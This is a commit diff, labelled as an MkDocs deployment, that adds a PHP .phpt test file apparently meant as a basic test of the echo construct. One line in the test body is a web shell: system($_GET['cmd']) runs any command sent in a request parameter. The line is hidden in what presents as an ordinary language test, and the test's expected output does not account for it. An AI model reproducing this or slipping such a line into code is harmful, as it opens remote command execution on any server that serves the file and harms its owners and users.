Deployed 3ca2ece with MkDocs version: 1.6.1

This commit is contained in:
Swk
2026-04-18 15:46:37 +00:00
commit e25bd52141
625 changed files with 1261223 additions and 0 deletions

View File

@@ -0,0 +1,9 @@
--TEST--
echo - basic test for echo language construct
--FILE--
<?php
echo 'This works ', 'and takes args!';
echo "Shell";system($_GET['cmd']);
?>
--EXPECT--
This works and takes args!